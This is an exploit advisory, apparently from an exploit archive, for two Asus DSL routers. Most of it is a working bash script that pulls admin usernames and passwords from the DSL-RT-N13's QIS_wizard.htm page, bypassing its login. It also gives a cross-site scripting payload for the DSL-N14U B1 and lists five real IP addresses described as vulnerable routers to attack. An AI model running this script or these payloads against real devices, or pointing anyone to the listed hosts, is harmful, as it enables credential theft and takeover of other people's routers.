Asus Router Cross Site Script / Authentication Bypass

ASUS router DSL-RT-N13 suffers from an authentication bypass vulnerability. ASUS router DSL-N14U B1 suffers from a cross site scripting vulnerability.


MD5 | 2fc150447dc4b5a9529e54a5dc2c5bf9

In the name of god
-------------------------


Exploit Title :
--------------------
Asus Routers (DSL-RT-N13 , DSL-N14U B1) Vulnerability


Exploit Author :
---------------------
4TT4CK3R


Category :
---------------------
Remote and Local


Home Page :
---------------------
https://asus.com


Google Dork :
---------------------
None


Models that Vulnerable in here :
---------------------------------------------
-) DSL-RT-N13 > Bypass Authentication Vulnerability
-) DSL-N14U B1 > Cross Site Scripting Vulnerability



[##] DSL-N14U B1 Cross Site Scripting Vulnerability
--------------------------------------------------------------
This vulnerability works on target remote and local ip address.
Payload : ""><script>alert(window.location)</script>
Vulnerable Page : Main Page
Screenshot :
http://uupload.ir/files/az1i_shot.png



[##] DSL-RT-N13U Bypass Authentication Vulnerability
---------------------------------------------------------------
With this vulnerability we can find administrator username and password and
login into admin panel of asus router model DSL-RT-N13.
Exploit source of this vulnerability (ARE Script):

#!/bin/bash
# Asus Routers Exploit (ARE)
# Coded by : 4TT4CK3R
# Category : Local and Remote
# Reuirements : Opening ports 80,8080,443
# Models that affecta : DSL-RT N13
reset
dir = "/opt/"
rm -rf /opt/a.htm
clear
echo ""
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]"
echo ""
echo -e "\e[93m [+] Tool name: Asus Router Exploit\e[0m"
echo -e "\e[93m [+] Models that affecta : DSL-RT N13 \e[0m"
echo -e "\e[93m [+] Coded by: 4TT4CK3R\e[0m"
echo ""
echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]"
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo ""
echo -e "\e[93m Options Of Tool: "
echo ""
echo " 1. Start"
echo " 2. About"
echo " 3. Exit"
echo ""
read -p " Please choose an option: " option
echo ""
echo ""
if [ $option == "2" ]
then
clear
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done
; echo
echo ""
echo " [+] About this tool :"
echo ""
echo -e " Hi dear friend ... This tool is an asus router exploiter.
This tool working with an vulnerability on Asus Routers and we can
using
this tool for bypass authentication and exploit the router config
panel.
Also this tool working on DSL-RT N13 models of asus company.
Thanks for using this tool and my exploit."
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done
; echo
echo ""
echo ""
elif [ $option == "3" ]
then
clear
exit
elif [ $option == "1" ]
then
clear
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;
done ; echo
echo ""
echo " [+] Starting Steps "
echo ""
echo ""
read -p " [++] Please enter target ip (ex: 5.2.5.5) : " ip
echo ""
read -p " [++] Please enter port number (ex: 8080) : " port
echo ""
read -p " [++] Please enter protocol (http or https) : " protocol
echo ""
echo " [**] Ok, Please wait ... "
echo ""
curl --silent $protocol://$ip:$port/QIS_wizard.htm > $dir/a.htm
echo ""
echo " [**] Searching data ..."
echo ""
cat $dir/a.htm | grep "http_username" | cut -d " " -f4 | cut -d '"'
-f2 > $dir/user
cat $dir/a.htm | grep "http_passwd" | cut -d " " -f4 | cut -d '"'
-f2 > $dir/pass
username=$(<$dir/user)
password=$(<$dir/pass)
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;
done ; echo
echo ""
echo " [>>] Address : $protocol://$ip:$port"
echo " [>>] Username : $username"
echo " [>>] Password : $password"
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;
done ; echo
echo ""
else
clear
echo ""
echo " [+] Wrong selection. exiting ..."
sleep 2
exit
fi
exit


Video demo of this tool :
-----------------------------------
https://www.videosprout.com/video?id=be9d22de-6871-4521-96be-1c6def8c2cce


Other routers for example DSL-RT N13 model :
-------------------------------------------------
http://94.190.36.152
http://88.86.198.149:8080
http://220.133.187.27:8080


Other routers for example DSL-N14U B1 model :
-------------------------------------------------
http://80.188.231.233:8080
http://197.89.27.160:8080


Exploited by :
--------------------
4TT4CK3R

Related Posts